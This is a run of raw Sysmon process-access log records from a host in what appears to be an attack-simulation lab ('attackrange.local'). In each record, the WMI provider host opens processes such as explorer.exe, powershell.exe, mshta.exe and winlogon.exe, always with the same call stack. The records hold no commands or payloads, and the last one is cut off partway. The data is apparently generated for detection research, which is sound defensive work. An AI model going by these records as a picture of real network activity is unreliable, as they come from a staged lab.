15:59:20.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4106-00000000A301}7412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023907Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-4006-00000000A301}5512C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023906Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023905Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023904Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023903Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023902Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023901Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023900Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:20.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 